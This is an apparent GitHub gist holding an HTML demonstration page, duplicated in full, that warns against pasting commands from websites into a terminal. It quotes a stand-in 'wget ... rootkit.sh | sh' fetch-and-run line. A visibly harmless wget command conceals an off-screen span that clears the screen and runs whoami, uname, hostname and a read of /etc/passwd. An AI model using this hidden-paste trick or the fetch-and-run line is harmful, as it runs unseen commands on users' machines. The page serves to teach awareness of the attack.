0x9090/gist:4d14a68afe6c8314f92e

## gistfile1.html

<html>
<head>
  <title>sneaky copy-paste terminal example</title>
</head>
  <style>
    .codeblock {
      background-color: lightyellow;
      border: 1px dotted black;
      margin-left: 50px;
      display: inline-block;
    }
  </style>
<body>
  <h3>intro</h3>
  <p>
<font size=3>  This shows an example of how it is dangerous to copy and paste lines of code from a website into your terminal, even if they are seemingly plaintext. I'm not talking about that shit where it's obviously bad to run something like <i>wget http://evilhax.or/rootkit.sh -O - | sh</i><br>Oh no, my friends. This is far worse. This is not anything new to the world, I had just happened to see it mentioned elsewhere earlier today and I found it interesting.</p>
<h3>hax</h3>
  <p>
  <ul>
    <li>select the line of code in the box below with your mouse</li>
    <li>copy it using ctrl+c (cmd+c on osx, whatever...)</li>
    <li>paste it into your terminal</li>
    <li>be..fucking...amazed...</li>
  </ul>
  </p>
  <p class="codeblock">
     wget <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hey there ";whoami|tr -d '\n';echo -e "\nheres some info from your box:\n";uname -a; hostname; head -n1 /etc/passwd<br></span>http://www.nullable.software/hi/copypasta.html
  </p>

<h3>references</h3>
  <ul>
    <li> http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt</li>
    <li> http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/</li>
  </ul>
</font>
</body>
</html>

	<html>
	<head>
	<title>sneaky copy-paste terminal example</title>
	</head>
	<style>
	.codeblock {
	background-color: lightyellow;
	border: 1px dotted black;
	margin-left: 50px;
	display: inline-block;
	}
	</style>
	<body>
	<h3>intro</h3>
	<p>
	<font size=3> This shows an example of how it is dangerous to copy and paste lines of code from a website into your terminal, even if they are seemingly plaintext. I'm not talking about that shit where it's obviously bad to run something like <i>wget http://evilhax.or/rootkit.sh -O - \| sh</i><br>Oh no, my friends. This is far worse. This is not anything new to the world, I had just happened to see it mentioned elsewhere earlier today and I found it interesting.</p>
	<h3>hax</h3>
	<p>
	<ul>
	<li>select the line of code in the box below with your mouse</li>
	<li>copy it using ctrl+c (cmd+c on osx, whatever...)</li>
	<li>paste it into your terminal</li>
	<li>be..fucking...amazed...</li>
	</ul>
	</p>
	<p class="codeblock">
	wget <span style="position: absolute; left: -100px; top: -100px">/dev/null; clear; echo -n "Hey there ";whoami\|tr -d '\n';echo -e "\nheres some info from your box:\n";uname -a; hostname; head -n1 /etc/passwd<br></span>http://www.nullable.software/hi/copypasta.html
	</p>

	<h3>references</h3>
	<ul>
	<li> http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt</li>
	<li> http://www.reddit.com/r/netsec/comments/1bv359/dont_copypaste_from_website_to_terminal_demo/</li>
	</ul>
	</font>
	</body>
	</html>